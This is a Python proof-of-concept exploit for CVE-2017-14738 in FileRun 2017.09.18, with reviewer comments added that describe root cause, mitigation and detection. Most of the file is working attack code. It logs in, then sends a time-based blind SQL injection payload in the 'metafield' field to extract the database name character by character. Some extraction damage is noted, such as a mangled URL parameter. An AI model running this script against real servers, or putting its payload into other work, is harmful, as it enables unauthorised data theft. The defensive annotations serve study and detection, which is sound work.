#!/usr/bin/env python
# Exploit Title: FileRun <=2017.09.18
# Date: September 29, 2017
# Exploit Author: SPARC
# Vendor Homepage: https://www.filerun.com/
# Software Link: http://f.afian.se/wl/?id=EHQhXhXLGaMFU7jI8mYNRN8vWkG9LUVP&recipient=d3d3LmZpbGVydW4uY29t
# Version: 2017.09.18
# Tested on: Ubuntu 16.04.3, Apache 2.4.7, PHP 7.0
# CVE : CVE-2017-14738
#
# Reviewer notes (defensive context):
# - What this is: a proof of concept for CVE-2017-14738, a post-authentication,
#   time-based blind SQL injection. The injected text travels in the
#   `metafield` POST field of the search grid request built in konek().
# - Root cause (inferred from the payload shape, which closes a parenthesis
#   after a number): the field presumably reaches a SQL statement without
#   being bound as a parameter or validated -- confirm against the vendor fix.
# - Mitigation: run a FileRun build newer than the 2017.09.18 release listed
#   above (confirm the fixed build in the vendor changelog); server-side, the
#   value should be bound as a query parameter or checked against the known
#   metadata field identifiers.
# - Detection: the loops at the bottom send one authenticated POST per guess
#   (up to 255 positions x 94 candidate values) to the same endpoint, with
#   SQL keywords such as SLEEP/ORD/MID in `metafield`, and response times that
#   track the injected delay. A burst like that from one session is a strong
#   signal in web-server or WAF logs.
# - The script is Python 2 only (print statements, raw_input, urllib2,
#   cookielib) and talks plain http://, so the credentials and the session
#   cookie cross the network unencrypted.
# - The listing this was recovered from had lost its line breaks and
#   indentation; block structure below was restored from the syntax.

import sys,time,urllib,urllib2,cookielib
from time import sleep

# Banner. The ASCII art lost its original line breaks in extraction; the
# literal is kept exactly as it appears on the page.
print """ #===============================================================# | | |___| | | |\___ \__ \ _ \ __ \__|_ \__| _` || || | |__/ | | |__/ | ( || |_____/.__/ \___|_|_|\__|\___|_|\__,_|| | _|| | | | FileRun <= 2017.09.18 | | BlindSQLi Proof of Concept (Post Authentication)| |by Spentera Research (research[at]spentera.id) | | | #===============================================================# """

# Interactive inputs: host plus a valid account (the issue is post-auth).
host = raw_input("[*] Target IP: ")
username = raw_input("[*] Username: ")
password = raw_input("[*] Password: ")
# NOTE(review): '§ion' looks like an HTML-entity mangling of '&section'
# introduced by page extraction -- confirm against the original advisory.
target = 'http://%s/?module=search§ion=ajax&page=grid' %(host)
# Seconds of server-side sleep used as the timing signal.
delay=1
# A `global` statement at module level has no effect; the names are only
# created when masuk() assigns them.
global cookie,data

def masuk(usr,pswd):
    """Log in and build the session Cookie header ("masuk": log in).

    POSTs usr/pswd to the fileman login endpoint on the global `host`,
    stores the received cookies as a dict in the global `data`, and stores
    a 'language=english; FileRunSID=...' header string in the global
    `cookie`. Returns the login response body as a str. On any exception
    it prints a credential message and exits.
    """
    log_data = {
        'username': usr,
        'password': pswd
    }
    post_data = urllib.urlencode(log_data)
    cookjar = cookielib.CookieJar()
    # Opener with a cookie processor so Set-Cookie values land in cookjar.
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookjar))
    try:
        req = urllib2.Request('http://%s/?module=fileman&page=login&action=login'%(host), post_data)
        content = opener.open(req)
        global data,cookie
        data = dict((cookie.name, cookie.value) for cookie in cookjar)
        # Raises KeyError when no FileRunSID cookie was set.
        cookie = ("language=english; FileRunSID=%s"%(data['FileRunSID']))
        return str(content.read())
    except:
        # Bare except: network errors and the KeyError above all end up here,
        # so the credential message can be misleading. Exit status 0 reports
        # success to the calling shell even though the run failed.
        print '\n[-] Uh oh! Exploit fail.. PLEASE CHECK YOUR CREDENTIAL'
        sys.exit(0)

def konek(m,n):
    """Send one timed search request and return the elapsed whole seconds.

    m is the 1-based character position in the current database name and n
    the character code it is compared against. The injected expression
    makes the server sleep `delay` seconds when the code at position m is
    greater than n, and `delay` - 1 seconds otherwise. The request carries
    the session header built by masuk(). On any exception it prints a
    failure message and exits.
    """
    #borrow from SQLmap :)
    query=("7) AND (SELECT * FROM (SELECT(SLEEP(%s-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),%s,1))>%s,0,1)))))wSmD) AND (8862=8862" %(delay,m,n))
    # Only `metafield` carries injected text; the other fields are fixed
    # search parameters.
    values = {
        'metafield': query,
        'searchType': 'meta',
        'keyword': 'work',
        'searchPath': '/ROOT/HOME',
        'path': '/ROOT/SEARCH'
    }
    req = urllib2.Request(target, urllib.urlencode(values))
    req.add_header('Cookie', cookie)
    try:
        # Wall-clock timing around the request; int() truncates to whole
        # seconds, so network latency under one second is ignored.
        starttime=time.time()
        response = urllib2.urlopen(req)
        endtime = time.time()
        return int(endtime-starttime)
    except:
        # Bare except hides the real error; exit status 0 as in masuk().
        print '\n[-] Uh oh! Exploit fail..'
        sys.exit(0)

print "[+] Logging in to the application..."
sleep(1)
# cekmasuk: login response body ("cek masuk": check login).
cekmasuk = masuk(username,password)
# Continue only if the login response contains 'success'; otherwise the
# script ends without printing anything further.
if u'success' in cekmasuk:
    print "[*] Using Time-Based method with %ds delay."%int(delay)
    print "[+] Starting to dump current database. This might take time.."
    sys.stdout.write('[+] Target current database is: ')
    sys.stdout.flush()
    starttime = time.time()
    # Positions 1..255, candidate codes 32..125 in ascending order: one POST
    # per (m, n) pair until a response comes back faster than `delay`.
    for m in range(1,256):
        for n in range(32,126):
            # wkttunggu: elapsed seconds ("waktu tunggu": wait time).
            wkttunggu = konek(m,n)
            if (wkttunggu < delay):
                sys.stdout.write(chr(n))
                sys.stdout.flush()
                break
    endtime = time.time()
    print "\n[+] Done in %d seconds" %int(endtime-starttime)